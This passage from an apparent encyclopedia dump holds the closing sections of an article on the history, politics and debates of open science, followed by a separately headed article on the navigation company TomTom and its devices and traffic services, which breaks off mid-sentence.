this was problematic for scientists who wanted to benefit from priority. These cases are representative of a system of aristocratic patronage in which scientists received funding to develop either immediately useful things or to entertain. In this sense, funding of science gave prestige to the patron in the same way that funding of artists, writers, architects, and philosophers did. Because of this, scientists were under pressure to satisfy the desires of their patrons, and discouraged from being open with research which would bring prestige to persons other than their patrons. Emergence of academies and journals Eventually the individual patronage system ceased to provide the scientific output which society began to demand. Single patrons could not sufficiently fund scientists, who had unstable careers and needed consistent funding. The development which changed this was a trend to pool research by multiple scientists into an academy funded by multiple patrons. In 1660 England established the Royal Society and in 1666 the French established the French Academy of Sciences. Between the 1660s and 1793, governments gave official recognition to 70 other scientific organizations modeled after those two academies. In 1665, Henry Oldenburg became the editor of Philosophical Transactions of the Royal Society, the first academic journal devoted to science, and the foundation for the growth of scientific publishing. By 1699 there were 30 scientific journals; by 1790 there were 1052. Since then publishing has expanded at even greater rates. Popular Science Writing The first popular science periodical of its kind was published in 1872, under a suggestive name that is still a modern portal for the offering science journalism: Popular Science. The magazine claims to have documented the invention of the telephone, the phonograph, the electric light and the onset of automobile technology. The magazine goes so far as to claim that the "history of Popular Science is a true reflection of humankind's progress over the past 129+ years". Discussions of popular science writing most often contend their arguments around some type of "Science Boom". A recent historiographic account of popular science traces mentions of the term "science boom" to Daniel Greenberg's Science and Government Reports in 1979 which posited that "Scientific magazines are bursting out all over. Similarly, this account discusses the publication Time, and its cover story of Carl Sagan in 1980 as propagating the claim that popular science has "turned into enthusiasm". Crucially, this secondary accounts asks the important question as to what was considered as popular "science" to begin with. The paper claims that any account of how popular science writing bridged the gap between the informed masses and the expert scientists must first consider who was considered a scientist to begin with. Collaboration among academies In modern times many academies have pressured researchers at publicly funded universities and research institutions to engage in a mix of sharing research and making some technological developments proprietary. Some research products have the potential to generate commercial revenue, and in hope of capitalizing on these products, many research institutions withhold information and technology which otherwise would lead to overall scientific advancement if other research institutions had access to these resources. It is difficult to predict the potential payouts of technology or to assess the costs of withholding it, but there is general agreement that the benefit to any single institution of holding technology is not as great as the cost of withholding it from all other research institutions. Coining of phrase "Open Science" Although Steve Mann claims to have coined the phrase "Open Science" in 1998, at which time he also registered the domain name openscience.com and openscience.org which he sold to degruyter.com in 2011, it was actually first used in a manner that refers to today's 'open science' norms by Daryl E. Chubin in his essay "Open Science and Closed Science: Tradeoffs in a Democracy". Chubin's essay was basically a revisiting of Robert K. Merton's 1942 proposal of what we now refer to as Mertonian Norms for ideal science practices and scientific modes of communication. The term was used sporadically in the 1970s and 1980s in various scholarship to refer to different things, but clearly the Steve Mann does not deserve credit for inventing this term or the movement leading to its adoption. Internet and the free access to scientific documents The open science movement, as presented in activist and institutional discourses at the beginning of the 21st century, refers to different ways of opening up science, especially in the Internet age. Its first pillar is free access to scientific publications. The Budapest conference organised by the Open Society Foundations in 2001 was decisive in imposing this issue on the political landscape. The resulting declaration calls for the use of digital tools such as open archives and open access journals, free of charge for the reader. The idea of open access to scientific publications quickly became inseparable from the question of free licenses to guarantee the right to disseminate and possibly modify shared documents, such as the Creative Commons licenses, created in 2002. In 2011, a new text from the Budapest Open Initiative explicitly refers to the relevance of the CC-BY license to guarantee free dissemination and not only free access to a scientific document. The openness promise by the Internet is then extended to research data, which underpins scientific studies in different disciplines, as mentioned already in the Berlin Declaration in 2003. In 2007, the Organisation for Economic Co-operation and Development (OECD) published a report on access to publicly funded research data, in which it defined it as the data that validates research results. Beyond its democratic virtues, open science aims to respond to the replication crisis of research results, notably through the generalization of the opening of data or source code used to produce them or through the dissemination of methodological articles. The open science movement inspired several regulatory and legislative measures. Thus, in 2007, the University of Liège made the deposit of its researchers’ publications in its institutional open repository (Orbi) compulsory. The next year, the NIH Public Access Policy adopted a similar mandate for every paper funded by the National Institutes of Health. In France, the law for a digital Republic enacted in 2016 creates the right to deposit the validated manuscript of a scientific article in an open archive, with an embargo period following the date of publication in the journal. The law also creates the principle of reuse of public data by default. Politics In many countries, governments fund some science research. Scientists often publish the results of their research by writing articles and donating them to be published in scholarly journals, which frequently are commercial. Public entities such as universities and libraries subscribe to these journals. Michael Eisen, a founder of the Public Library of Science, has described this system by saying that "taxpayers who already paid for the research would have to pay again to read the results." In December 2011, some United States legislators introduced a bill called the Research Works Act, which would prohibit federal agencies from issuing grants with any provision requiring that articles reporting on taxpayer-funded research be published for free to the public online. Darrell Issa, a co-sponsor of the bill, explained the bill by saying that "Publicly funded research is and must continue to be absolutely available to the public. We must also protect the value added to publicly funded research by the private sector and ensure that there is still an active commercial and non-profit research community." One response to this bill was protests from various researchers; among them was a boycott of commercial publisher Elsevier called The Cost of Knowledge. The Dutch Presidency of the Council of the European Union called out for action in April 2016 to migrate European Commission funded research to Open Science. European Commissioner Carlos Moedas introduced the Open Science Cloud at the Open Science Conference in Amsterdam on 4–5 April. During this meeting also The Amsterdam Call for Action on Open Science was presented, a living document outlining concrete actions for the European Community to move to Open Science. The European Commission continues to be committed to an Open Science policy including developing a repository for research digital objects, European Open Science Cloud (EOSC) and metrics for evaluating quality and impact. In October2021, the French Ministry of Higher Education, Research and Innovation released an official translation of its second plan for open science spanning the years 2021–2024. Standard setting instruments There is currently no global normative framework covering all aspects of Open Science. In November 2019, UNESCO was tasked by its 193 Member States, during their 40th General Conference, with leading a global dialogue on Open Science to identify globally-agreed norms and to create a standard-setting instrument. The multistakeholder, consultative, inclusive and participatory process to define a new global normative instrument on Open Science is expected to take two years and to lead to the adoption of a UNESCO Recommendation on Open Science by Member States in 2021. Two UN frameworks set out some common global standards for application of Open Science and closely related concepts: the UNESCO Recommendation on Science and Scientific Researchers, approved by the General Conference at its 39th session in 2017, and the UNESCO Strategy on Open Access to scientific information and research, approved by the General Conference at its 36th session in 2011. Advantages and disadvantages Arguments in favor of open science generally focus on the value of increased transparency in research, and in the public ownership of science, particularly that which is publicly funded. In January 2014 J. Christopher Bare published a comprehensive "Guide to Open Science". Likewise, in 2017, a group of scholars known for advocating open science published a "manifesto" for open science in the journal Nature. Advantages Open access publication of research reports and data allows for rigorous peer-review An article published by a team of NASA astrobiologists in 2010 in Science reported a bacterium known as GFAJ-1 that could purportedly metabolize arsenic (unlike any previously known species of lifeform). This finding, along with NASA's claim that the paper "will impact the search for evidence of extraterrestrial life", met with criticism within the scientific community. Much of the scientific commentary and critique around this issue took place in public forums, most notably on Twitter, where hundreds of scientists and non-scientists created a hashtag community around the hashtag #arseniclife. University of British Columbia astrobiologist Rosie Redfield, one of the most vocal critics of the NASA team's research, also submitted a draft of a research report of a study that she and colleagues conducted which contradicted the NASA team's findings; the draft report appeared in arXiv, an open-research repository, and Redfield called in her lab's research blog for peer review both of their research and of the NASA team's original paper. Researcher Jeff Rouder defined Open Science as "endeavoring to preserve the rights of others to reach independent conclusions about your data and work". Publicly funded science will be publicly available Public funding of research has long been cited as one of the primary reasons for providing Open Access to research articles. Since there is significant value in other parts of the research such as code, data, protocols, and research proposals a similar argument is made that since these are publicly funded, they should be publicly available under a Creative Commons Licence. Open science will make science more reproducible and transparent Increasingly the reproducibility of science is being questioned and for many papers or multiple fields of research was shown to be lacking. This problem has been described as a "reproducibility crisis". For example, psychologist Stuart Vyse notes that "(r)ecent research aimed at previously published psychology studies has demonstrated--shockingly--that a large number of classic phenomena cannot be reproduced, and the popularity of p-hacking is thought to be one of the culprits." Open Science approaches are proposed as one way to help increase the reproducibility of work as well as to help mitigate against manipulation of data. Open science has more impact There are several components to impact in research, many of which are hotly debated. However, under traditional scientific metrics parts Open science such as Open Access and Open Data have proved to outperform traditional versions. Open science will help answer uniquely complex questions Recent arguments in favor of Open Science have maintained that Open Science is a necessary tool to begin answering immensely complex questions, such as the neural basis of consciousness, or pandemics such as the COVID-19 pandemic. The typical argument propagates the fact that these type of investigations are too complex to be carried out by any one individual, and therefore, they must rely on a network of open scientists to be accomplished. By default, the nature of these investigations also makes this "open science" as "big science". It is thought that open science could support innovation and societal benefits, supporting and reinforcing research activities by enabling digital resources that could, for example, use or provide structured open data. Disadvantages Arguments against open science tend to focus on the advantages of data ownership and concerns about the misuse of data. Potential misuse In 2011, Dutch researchers announced their intention to publish a research paper in the journal Science describing the creation of a strain of H5N1 influenza which can be easily passed between ferrets, the mammals which most closely mimic the human response to the flu. The announcement triggered a controversy in both political and scientific circles about the ethical implications of publishing scientific data which could be used to create biological weapons. These events are examples of how science data could potentially be misused. It has been argued that constraining the dissemination of dual-use knowledge can in certain cases be justified because, for example, "scientists have a responsibility for potentially harmful consequences of their research; the public need not always know of all scientific discoveries [or all its details]; uncertainty about the risks of harm may warrant precaution; and expected benefits do not always outweigh potential harm". Scientists have collaboratively agreed to limit their own fields of inquiry on occasions such as the Asilomar conference on recombinant DNA in 1975, and a proposed 2015 worldwide moratorium on a human-genome-editing technique. Differential technological development aims to decrease risks by influencing the sequence in which technologies are developed. Relying only on the established form of legislation and incentives to ensure the right outcomes may not be adequate as these may often be too slow. The public may misunderstand science data In 2009 NASA launched the Kepler spacecraft and promised that they would release collected data in June 2010. Later they decided to postpone release so that their scientists could look at it first. Their rationale was that non-scientists might unintentionally misinterpret the data, and NASA scientists thought it would be preferable for them to be familiar with the data in advance so that they could report on it with their level of accuracy. Low-quality science Post-publication peer review, a staple of open science, has been criticized as promoting the production of lower quality papers that are extremely voluminous. Specifically, critics assert that as quality is not guaranteed by preprint servers, the veracity of papers will be difficult to assess by individual readers. This will lead to rippling effects of false science, akin to the recent epidemic of false news, propagated with ease on social media websites. Common solutions to this problem have been cited as adaptations of a new format in which everything is allowed to be published but a subsequent filter-curator model is imposed to ensure some basic quality of standards are met by all publications. Entrapment by platform capitalism For Philip Mirowski open science runs the risk of continuing a trend of commodification of science which ultimately serves the interests of capital in the guise of platform capitalism. Actions and initiatives Open-science projects Different projects conduct, advocate, develop tools for, or fund open science. The Allen Institute for Brain Science conducts numerous open science projects while the Center for Open Science has projects to conduct, advocate, and create tools for open science. Other workgroups have been created in different fields, such as the Decision Analysis in R for Technologies in Health (DARTH) workgroup], which is a multi-institutional, multi-university collaborative effort by researchers who have a common goal to develop transparent and open-source solutions to decision analysis in health. Organizations have extremely diverse sizes and structures. The Open Knowledge Foundation (OKF) is a global organization sharing large data catalogs, running face to face conferences, and supporting open source software projects. In contrast, Blue Obelisk is an informal group of chemists and associated cheminformatics projects. The tableau of organizations is dynamic with some organizations becoming defunct, e.g., Science Commons, and new organizations trying to grow, e.g., the Self-Journal of Science. Common organizing forces include the knowledge domain, type of service provided, and even geography, e.g., OCSDNet's concentration on the developing world. The Allen Brain Atlas maps gene expression in human and mouse brains; the Encyclopedia of Life documents all the terrestrial species; the Galaxy Zoo classifies galaxies; the International HapMap Project maps the haplotypes of the human genome; the Monarch Initiative makes available integrated public model organism and clinical data; and the Sloan Digital Sky Survey which regularizes and publishes data sets from many sources. All these projects accrete information provided by many different researchers with different standards of curation and contribution. Mathematician Timothy Gowers launched open science journal Discrete Analysis in 2016 to demonstrate that a high-quality mathematics journal could be produced outside the traditional academic publishing industry. The launch followed a boycott of scientific journals that he initiated. The journal is published by a nonprofit which is owned and published by a team of scholars. Other projects are organized around completion of projects that require extensive collaboration. For example, OpenWorm seeks to make a cellular level simulation of a roundworm, a multidisciplinary project. The Polymath Project seeks to solve difficult mathematical problems by enabling faster communications within the discipline of mathematics. The Collaborative Replications and Education project recruits undergraduate students as citizen scientists by offering funding. Each project defines its needs for contributors and collaboration. Another practical example for open science project was the first "open" doctoral thesis started in 2012. It was made publicly available as a self-experiment right from the start to examine whether this dissemination is even possible during the productive stage of scientific studies. The goal of the dissertation project: Publish everything related to the doctoral study and research process as soon as possible, as comprehensive as possible and under an open license, online available at all time for everyone. End of 2017, the experiment was successfully completed and published in early 2018 as an open access book. The ideas of open science have also been applied to recruitment with jobRxiv, a free and international job board that aims to mitigate imbalances in what different labs can afford to spend on hiring. Advocacy Numerous documents, organizations, and social movements advocate wider adoption of open science. Statements of principles include the Budapest Open Access Initiative from a December 2001 conference and the Panton Principles. New statements are constantly developed, such as the Amsterdam Call for Action on Open Science to be presented to the Dutch Presidency of the Council of the European Union in late May 2016. These statements often try to regularize licenses and disclosure for data and scientific literature. Other advocates concentrate on educating scientists about appropriate open science software tools. Education is available as training seminars, e.g., the Software Carpentry project; as domain specific training materials, e.g., the Data Carpentry project; and as materials for teaching graduate classes, e.g., the Open Science Training Initiative. Many organizations also provide education in the general principles of open science. Within scholarly societies there are also sections and interest groups that promote open science practices. The Ecological Society of America has an Open Science Section. Similarly, the Society for American Archaeology has an Open Science Interest Group. Journal support Many individual journals are experimenting with the open access model: the Public Library of Science, or PLOS, is creating a library of open access journals and scientific literature. Other publishing experiments include delayed and hybrid models. There are experiments in different fields: F1000Research provides open publishing and open peer review for the life sciences. The open-science initiative of the Empirical Software Engineering Journal encourages authors to submit a replication package which is assessed with an open science badge. The Open Library of Humanities is a non-profit open access publisher for the humanities and social sciences. The Journals Library of the National Institute for Health Research (NIHR) publishes all relevant documents and data from the onset of research projects, updating them alongside the progress of the study. Journal support for open-science does not contradict with preprint servers: figshare archives and shares images, readings, and other data; and Open Science Framework preprints, arXiv, and HAL Archives Ouvertes provide electronic preprints across many fields. Software A variety of computer resources support open science. These include software like the Open Science Framework from the Center for Open Science to manage project information, data archiving and team coordination; distributed computing services like Ibercivis to use unused CPU time for computationally intensive tasks; and services like Experiment.com to provide crowdsourced funding for research projects. Blockchain platforms for open science have been proposed. The first such platform is the Open Science Organization, which aims to solve urgent problems with fragmentation of the scientific ecosystem and difficulties of producing validated, quality science. Among the initiatives of Open Science Organization include the Interplanetary Idea System (IPIS), Researcher Index (RR-index), Unique Researcher Identity (URI), and Research Network. The Interplanetary Idea System is a blockchain based system that tracks the evolution of scientific ideas over time. It serves to quantify ideas based on uniqueness and importance, thus allowing the scientific community to identify pain points with current scientific topics and preventing unnecessary re-invention of previously conducted science. The Researcher Index aims to establish a data-driven statistical metric for quantifying researcher impact. The Unique Researcher Identity is a blockchain technology based solution for creating a single unifying identity for each researcher, which is connected to the researcher's profile, research activities, and publications. The Research Network is a social networking platform for researchers. A scientific paper from November 2019 examined the suitability of blockchain technology to support open science. Preprint servers Preprint Servers come in many varieties, but the standard traits across them are stable: they seek to create a quick, free mode of communicating scientific knowledge to the public. Preprint servers act as a venue to quickly disseminate research and vary on their policies concerning when articles may be submitted relative to journal acceptance. Also typical of preprint servers is their lack of a peer-review process – typically, preprint servers have some type of quality check in place to ensure a minimum standard of publication, but this mechanism is not the same as a peer-review mechanism. Some preprint servers have explicitly partnered with the broader open science movement. Preprint servers can offer service similar to those of journals, and Google Scholar indexes many preprint servers and collects information about citations to preprints. The case for preprint servers is often made based on the slow pace of conventional publication formats. The motivation to start Socarxiv, an open-access preprint server for social science research, is the claim that valuable research being published in traditional venues often takes several months to years to get published, which slows down the process of science significantly. Another argument made in favor of preprint servers like Socarxiv is the quality and quickness of feedback offered to scientists on their pre-published work. The founders of Socarxiv claim that their platform allows researchers to gain easy feedback from their colleagues on the platform, thereby allowing scientists to develop their work into the highest possible quality before formal publication and circulation. The founders of Socarxiv further claim that their platform affords the authors the greatest level of flexibility in updating and editing their work to ensure that the latest version is available for rapid dissemination. The founders claim that this is not traditionally the case with formal journals, which instate formal procedures to make updates to published articles. Perhaps the strongest advantage of some preprint servers is their seamless compatibility with Open Science software such as the Open Science Framework. The founders of SocArXiv claim that their preprint server connects all aspects of the research life cycle in OSF with the article being published on the preprint server. According to the founders, this allows for greater transparency and minimal work on the authors' part. One criticism of pre-print servers is their potential to foster a culture of plagiarism. For example, the popular physics preprint server ArXiv had to withdraw 22 papers when it came to light that they were plagiarized. In June 2002, a high-energy physicist in Japan was contacted by a man called Ramy Naboulsi, a non-institutionally affiliated mathematical physicist. Naboulsi requested Watanabe to upload his papers on ArXiv as he was not able to do so, because of his lack of an institutional affiliation. Later, the papers were realized to have been copied from the proceedings of a physics conference. Preprint servers are increasingly developing measures to circumvent this plagiarism problem. In developing nations like India and China, explicit measures are being taken to combat it. These measures usually involve creating some type of central repository for all available pre-prints, allowing the use of traditional plagiarism detecting algorithms to detect the fraud . Nonetheless, this is a pressing issue in the discussion of pre-print servers, and consequently for open science. See also Citizen science GeneLab Journalology Metascience Open data Open science data Open access Open education Open peer review Open research Open source Open government Open Energy Modelling Initiative Open synthetic biology Plan S Science journalism Trial registration References Sources External links a TED talk video by Michael Nielsen on open science https://www.nytimes.com/2012/01/17/science/open-science-challenges-journal-tradition-with-web-collaboration.html?hpw Open access (publishing) Academic publishing Data publishing Metascience
3684349
https://en.wikipedia.org/wiki/TomTom
TomTom
TomTom N.V. is a Dutch multinational developer and creator of location technology and consumer electronics. Founded in 1991 and headquartered in Amsterdam, TomTom released its first generation of satellite navigation devices to market in 2004. the company has over 4,500 employees worldwide and operations in 29 countries throughout Europe, Asia-Pacific, and the Americas. History The company was founded in Amsterdam in 1991 as Palmtop Software, by Corinne Vigreux, Peter-Frans Pauwels and Pieter Geelen. The company focused on corporate handheld device software before focusing on the consumer market and releasing the first route planning software for mobile devices in 1996. Software was developed mainly for Psion devices and the company was one of the largest developers of Psion software in the late 1990s. Palmtop also worked with Psion in the development of EPOC32. Software was also developed for Palm and Windows CE devices. In 1999, Vigreux's husband, Harold Goddijn left Psion Netherlands, for which TomTom made software and where Vigreux was previously sales director, to join TomTom. He had previously invested in TomTom. In 2001, the company's brand name changed to TomTom, while its legal name was also changed by 2003. On 27 May 2005, TomTom listed on the Amsterdam Stock Exchange, valuing the company at nearly €50 million. In September 2005 TomTom acquired Datafactory AG, a telematics service provider based in Leipzig. Datafactory AG employed around 30 people and realized a turnover of approximately €5 million in 2004 and a small net profit. In January 2006, TomTom acquired the UK company Applied Generics, forming TomTom Traffic. In 2008, TomTom acquired Tele Atlas, a digital map maker, for €2.9 billion. In 2010, they produced an advert saying You are not stuck in traffic. You are traffic. A photograph of this was widely circulated on the internet. It became a meme, often with different images and sometimes reworded slightly. On 11 June 2012, at an event for Apple's iOS 6 preview, TomTom was announced as the main mapping data provider for Apple's revamped iOS 6 "Maps" app, replacing Google Maps. In 2014, TomTom partnered with Volkswagen Group for joint research on Highly Automated Driving (HAD) systems. TomTom signed deals to provide their navigation devices to several carmakers including Volkswagen Group, Daimler, Toyota and others. In late 2015, TomTom extended its deal with Apple and signed a new contract with Uber, in which Uber driver app uses TomTom maps and traffic data in 300 cities worldwide. In May 2018, TomTom launched new portable navigation device the TomTom Go Camper to cater for the requirements of caravan and motorhome users. In January 2018 the company faced criticism for announcing that it would no longer be providing map updates for some devices. It also said that "lifetime" meant the "useful life" of a device. In 2020 the company signed a deal with Chinese Huawei to use the maps in Huawei's smartphones to replace the Google Maps. Product history Until 1996, TomTom developed business-to-business applications such as meter reading and bar-code reading for handheld devices, such as Palm Pilot, Compaq iPaq and Psion Series 5. Subsequently, the company moved its focus to PDA software for the consumer market. Early mapping software included EnRoute, Citymaps and Routeplanner. By 2001, they released the first car satellite navigation software, the TomTom Navigator, shifting the company's focus to GPS car navigation. In 2004 a built-in subscription-based traffic update service was added. The first all-in-one device personal navigation device, the TomTom Go was released in March 2004, creating a new consumer electronics category. TomTom reports it has sold about 250,000 units of TomTom Go and this product represented 60% of the company's revenue for 2004. , the company had sold nearly 80 million navigation devices worldwide. In 2005, the ability to download new voices was introduced. The ruggedized, water-resistant Rider navigation device was released for motorcycle users in 2006. The Rider was the first portable satellite navigation device designed for motorcycles and scooters. Text-to-speech for road names was first introduced in 2006, along with hands-free calling and traffic support. TomTom Home, software for managing and downloading content for TomTom on a PC, was first released at this time. TomTom partnered with Vodafone in 2007 to create a high definition traffic service, designed to deliver real-time traffic data to Vodafone users through their devices. New features introduced in 2008 included IQ Routes, which estimated journey times based on average recorded speeds, rather than speed limits, and "Advanced Lane Guidance", an on-screen representation of the correct lane to take. In the autumn of 2008 devices were introduced with built-in GSM SIM cards, for connected features including HD Traffic, Google Local Search, real-time speed camera updates, and the facility to search for the cheapest fuel on route. In 2013 TomTom entered the GPS sports watch market with the launch of the TomTom Runner and TomTom Multi-Sport GPS. TomTom extended its range of GPS sports watches with the launch of the Runner Cardio GPS in 2014 with a built-in heart rate monitor. In 2015, TomTom entered a new product category with the launch of its new action camera, the Bandit. It had a built-in media server, enabling users to share footage in a matter of minutes. TomTom launched a new sports watch in 2016, the TomTom Spark, which in addition to GPS and a heart-rate monitor, included music on the wrist and a 24/7 activity tracker. In 2018, TomTom became the primary supplier of data for Apple's map app. TomTom Group business structure TomTom's business model targets two major market segments: location technology and consumer. Location Technology Location technology comprises the company's automotive and enterprise businesses, providing maps and navigation software as components of customer applications. The firm's automotive segment sells location technology components to carmakers. TomTom's navigation software is integrated into vehicles to provide current map data, online routing, and guidance and search information, allowing for vehicle features like destination prediction, traffic expectations, or charging points location and availability for electric vehicles. TomTom's enterprise segment sells its location technologies to tech. companies, government bodies, and traffic management entities. Consumer The consumer segment of TomTom's business sells portable, personal satellite navigation devices, once its core profit center. Usage of standalone GPS devices has since declined, despite the brand's efforts to contrast features to those of smartphone integrated alternatives. Recently, the company has transitioned its consumer business away from devices to offer software applications instead with digital maplinked services. This shift in focus is due partially to declining profitability as consumers utilize GPS alternatives with integrated navigation apps, and also to the anticipated rise in autonomous vehicle usage. Products and services TomTom as a company offers three types of products in different shapes and forms: maps, connected services and (navigation) software. TomTom Navigation devices (PNDs) and TomTom GO navigation apps are sold directly or indirectly to end-consumers. In-dashboard systems are released for the automotive market. The navigation devices and portable devices with installed software are referred to as units. TomTom partners with several car manufacturers and offers built-in navigation devices. Navigation TomTom units provide a flying interface with an oblique bird's-eye view of the road, as well as a direct-overhead map view. They use a GPS receiver to show the precise location and provide visual and spoken directions on how to drive to the specified destination. Some TomTom systems also integrate with mobile phones using Bluetooth, traffic congestion maps or to actually take calls and read SMS messages aloud. Navigation devices TomTom's all-in-one GPS navigation devices come with a touch screen, speaker, USB port, internal Lithium ion battery. Most models have Bluetooth transceivers that allow connection to a smartphone, allows the device to be used as a speakerphone to make and receive handsfree calls. TomTom Go, Via and Start – general purpose navigation devices. TomTom Camper & Caravan / RV – these models have a map that is supplied with height and width restrictions, which allows vehicle size and weight data to be entered for the route planning. TomTom Truck – designed for professional truck drivers and include truck-specific software and maps. TomTom Rider – Portable water-resistant models for motorcycle and motorscooter users. They differ from other devices in that the Rider is partly shielded and has a 'glove-friendly' screen and GUI. TomTom One and One XL – The TomTom One is the base model for automobile navigation. The difference between the TomTom One XL and the TomTom One is the size of the touch screen (4.3 vs 3.5 in or 110 vs 89 mm). Neither model of the One contains the added functions included in the Go models, such as Bluetooth hands-free calling and MP3 Jukebox. However, the One is able to receive traffic and weather updates using the TomTom Plus service when paired via Bluetooth with a mobile phone with a DUN data service. The reduced software capability means less demand on the hardware, which allows the One to be sold at a significantly lower price than the Go. The XL is also available as a Live version with integrated Live Services. Navigation software TomTom Navigator – a GPS navigation software product for personal digital assistants (PDAs), Palm devices, Pocket PCs, and some smartphones. TomTom Navigator 6 replaced the earlier TomTom Mobile 5.2. It can use GPS receivers built into the device or external (e.g., Bluetooth-connected) receivers. Navigator 7 was the latest release of this software, released as a part of the software that came with the June 2008 HTC Touch Diamond. Frequently used functions can be added to the main screen of the program, and users can report map corrections and share them with other users. Navigator supports touch screens; devices without touch screens use a cursor to input data. The software is available on SD card and DVD. It runs on a number of devices listed on the TomTom website, but will run successfully on many unlisted devices using the Windows Mobile operating system, discontinued in 2010. The DVD version includes a DVD, printed 15-character product code, Quick Start Guide, Licensing Agreement, a poster with a picture diagram for setup procedure of DVD version and SD card version, and an advertisement for associated TomTom Plus services. The DVD contains installation software for TomTom Home, software for mobile devices, licenses, manuals, maps, and voices. The software for mobile devices includes CAB files for Palm, PPC, Symbian, and UIQ3. TomTom for iOS – GPS navigation software product for iOS devices, originally announced for the iPhone at the Apple WWDC Keynote speech in early June 2009, and released internationally on 15 August 2009 in the Apple App Store, with various map packs for different regions. TomTom Vice President of Marketing Development gave information in an interview by Macworld in July 2009. Currently the app works with iPhone (all models), the iPod Touch (all models) and the iPad (all models), however Apple dropped the support for the early models and latest versions of the TomTom iOS app might have issues on certain devices. There are two separate TomTom car kits available for certain Apple devices. The current maps available in each countries' app stores varies according to language availability of the app itself, the country of the app store, and thus differing region group map packs are available. Turkey and Greece were not included in the larger Europe map pack; this is related to the AppStore's app size limitation of 2 GB. These maps are available separately. Iceland is not available in any map package sold by TomTom at the moment, but they are working on it (and a few other countries too). Also most likely there will be a new iOS app available, based on the NavKit, which might cure the issue with the size limit (also Apple increased the app size limit to 4 GB). TomTom Go Mobile, GPS navigation software for the Android operating system. It replaced the old app, which had similar features to the iOS app. In March 2015, TomTom announced the new TomTom Go Mobile app for Android with a freemium subscription model for maps with the first 50 miles/75 kilometres per month being free, including all the maps that are available, TomTom Traffic and Speed Cameras. The previous app, which had promised "free lifetime updates", is not available for purchase on Play Store anymore and its maps are not updated since October 2015. TomTom claims their definition of lifetime map updates is "the period of time that TomTom continues to support the app with updates". Previous customers of TomTom's Android navigation app are offered a discount on the subscription in the new app for three years. There is no provision for users who want to keep using the old app under the conditions it was sold with lifetime map updates. TomTom Speed Cameras, a mobile software application released in 2015 free of charge. Navigation software for several mobile phones was discontinued after release 5.2; Navigator, which does not support all the phones that Mobile did, is the nearest equivalent. Mobile 5.2 cannot use maps later than v6.60 build 1223; this and earlier program versions are not compatible with all map versions, particularly other builds of version 6. In September 2012, Apple collaborated with TomTom to provide mapping data for its revamped iOS 6 updated Apple Maps app. The partnership was in part due to Apple's decision to wean itself off the products of its competitor, Google. As of 2018 TomTom continues to provide data for Apple Maps. Support Applications TomTom Home (stylized as TomTom HOME) is a 32-bit PC application that allows synchronization/updates to be sent to the mobile device. TomTom Home version 2.0 and above is implemented on the XULRunner platform. With version 2.2, TomTom Home added a content-sharing platform where users can download and upload content to personalize their device such as voices, start-up images, POI sets, etc. At the moment TomTom Home is on version 2.9. Despite being based on the cross-platform XULRunner, TomTom Home lacks support for Linux. It is, for instance, impossible to update the maps in these devices by connecting them to another machine running Linux, even when using a common web browser like Firefox that normally allowed such an update under Microsoft Windows. However, the devices can still be read in a Linux OS as a disk drive. There is even software made by the community to manage some functions of the TomTom. The NAV3 and NAV4 range of models use MyDrive Connect. MyDrive Connect is compatible with 32bit and 64bit versions of Windows XP/Vista/7/8/8.1/10 preview and with most Mac OS X versions. The internal flash memory or the memory card content of the device cannot be accessed through USB for security reasons (modified applications would easily accept a map that wasn't sold by TomTom). The device can update itself by getting files through the HTTP protocol over USB. The support app is nothing more than a proxy on the PC buffering the download. So far the security achieved using this mechanism has not been broken yet. Also, the usage of the non-FAT/FAT32 file system brought stability improvements in device operations. Traffic services A traffic monitoring service that uses multiple sources to provide traffic information. The service does this by combining data from: traditional sources: governmental/third-party data such as induction loops in the roads, cameras and traffic surveillance new sources: traffic flow of millions of anonymous mobile phone users The information is merged by TomTom and algorithms are used to improve the data and filter out anomalous readings. The system sends updates to all TomTom Traffic users every two minutes (and the data the users receive is never older than 30 seconds). Users can receive the service through the built-in SIM, via a smartphone connection or on older devices via a standard phone connection. Re-routing can be set to be transparent to the user with the only sign that the route has been changed due to a traffic jam being a sound indication from the device and a changed . The system was first launched in the Netherlands in 2007 and expanded to the United Kingdom, France, Germany and Switzerland in 2008. By mid-2011, TomTom Live services including TomTom Traffic were available in the United States, South Africa, New Zealand and seventeen European countries: Austria, Belgium, Denmark, Finland, France, Germany, Ireland, Italy, Luxembourg, Netherlands, Norway, Poland, Portugal, Spain, Sweden, Switzerland and the United Kingdom. , the service is vastly expanded and current coverage is available on the TomTom Traffic site (34 countries and the list expands every few months to new regions). HD Traffic 6.0 (August 2012): More accurate location of traffic jams, improved coverage of automatically detected road closures TomTom Traffic 7.0 (September 2013): Increased accuracy of jam location now allows for 'Jam Ahead Warnings', warning drivers when approaching a jam-tail too fast. Improved coverage of automatic road closure detection started to include also major secondary roads. Automatic road works detection on highways. TomTom also added 'Predictive Flow Feed' for better predicting approaching traffic delays, with the goal of improving optimal route calculation and ETA. TomTom Traffic 8.0 (November 2014): TomTom included real-time weather information in their routing algorithms, and warns users in areas of bad weather. Also, version 8.0 now incorporates in their real-time traffic information road closures that are reported via the online Map Share Reporter tool. Consumer The company offers fee-based services under the name TomTom Plus (stylized TomTom PLUS), which include services to warn drivers about speed cameras, provide weather updates, change voices and provide traffic alerts. Currently, the fees are only for European countries. Traffic data is also available to subscribers in many parts of Europe and the US via a Bluetooth-enabled cell phone with Internet service or an add-on aerial, which picks up RDS data (broadcast on FM radio frequencies) offering traffic information without the requirement for a data connection. The TomTom Plus service is not compatible with Apple's iPhone. In October 2008 the company released Live Services on the Go 940 Live. These allowed users to receive updates over the mobile telephone network using the SIM card in the device. These services included HD Traffic, Safety Alerts, Local Search with Google and Fuel Prices. On 12 May 2011, TomTom announced that it was offering up its real-time traffic products to "industry partners" in the United States. On the latest NAV4 devices the service is not available anymore in the old form. The included services had been separated and now being called TomTom Traffic and Speed Cameras. On the x0/x00/x000 devices the traffic service is free of charge either via the built-in SIM (Always Connected models) or via a compatible smartphone (smartphone-connected or BYOD – bring-your-own-device). The speed camera service is free for three months on these models. However, there is a newer range, the x10/x100 models, which come now with free lifetime speed camera subscription too. Map Share is a proprietary map technology launched by TomTom in June 2007. Map Share allows users to make changes to the maps on their navigation devices and share them with others. It allows drivers to make changes to their maps directly on their navigation devices. Drivers can block or unblock streets, change the direction of traffic, edit street names and add, edit or remove points of interest (POIs). Improvements can be shared with other users through TomTom Home, TomTom's content management software. An online version called Map Share Reporter is on the TomTom website. IQ Routes, developed by TomTom and available since spring 2008 on the TomTom Go 730 and Go 930, uses anonymous travel time data accumulated by users of TomTom satnav devices. Newer TomTom devices use this data to take into account the time and day when determining the fastest route. Travel time data is stored in Historical Speed Profiles, one for each road segment, covering large motorways, main roads and also small 